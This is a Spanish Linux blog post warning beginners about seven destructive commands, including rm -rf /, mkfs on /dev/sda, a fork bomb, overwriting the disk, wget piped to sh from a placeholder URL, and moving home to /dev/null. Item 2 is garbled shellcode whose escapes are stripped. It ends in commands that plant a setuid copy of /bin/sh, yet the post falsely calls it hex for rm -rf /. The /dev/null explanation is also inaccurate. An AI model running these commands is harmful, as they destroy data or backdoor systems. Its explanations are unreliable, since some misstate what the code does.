Los 7 comandos mortales para Linux

Si te estas iniciando en el mundo de Gnu/Linux, no esta de más que tomes nota sobre las cosas que nunca deberías hacer. Es por ello que, a continuación, te mostramos 7 comandos que son mortales para el funcionamiento del sistema operativo del pingüino.


Algunos de estos comandos mortales son:


1. rm -rf /

Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.

2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.

3. mkfs.ext3 /dev/sda

Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).

4. :(){:|:&};:

Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.

5. cualquier_comando > /dev/sda

Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.

6. wget http://alguna_url -O- | sh

Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.

7. mv /home/tu_usuario/* /dev/null

Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).

Claro está, para poder realizar la mayoria de estos comandos, es requerido acceso a nivel superusuario, o root, en los pocos casos que no se requiere, como mucho y en general, afectará la información del propio usuario.
Esto es, hay muchos limites y controles, no se puede afectar mucho mas allá de los que estos nos permitan.
El root, como explicamos en otros post, está habilitado para hacer casi cualquier cosa, porque esta diseñado asi, y debe ser responsable de cada paso que se da. Imaginate que no se pueda formatear el disco y vaciarlo de contenido nunca. Seria conflictivo.

Riesgos hay en todo ... el asunto es, hay riesgos que son innecesarios, evitables y prevenibles ... y hay situaciones que requieren ciertos niveles de conocimiento, acceso, premeditación, intención y actitud expresa ... para causar daño real, o al menos intentarlo.

Por esto, tengan en consideración que, para tener un Linux a salvo, hay que evitar utilizar los permisos de root, sea de la forma que sea.

No navegues por Internet con un usuario root, evita dejar consolas abiertas con root, y otras consieraciones que pondré en un proximo post.

Saludos

Comentarios

Entradas populares de este blog

WanaCryptor Fix and Recovery

¡Descarga los fondos de escritorio de Linux Elementary OS!

Red Hat e IBM logran importante certificación de seguridad para KVM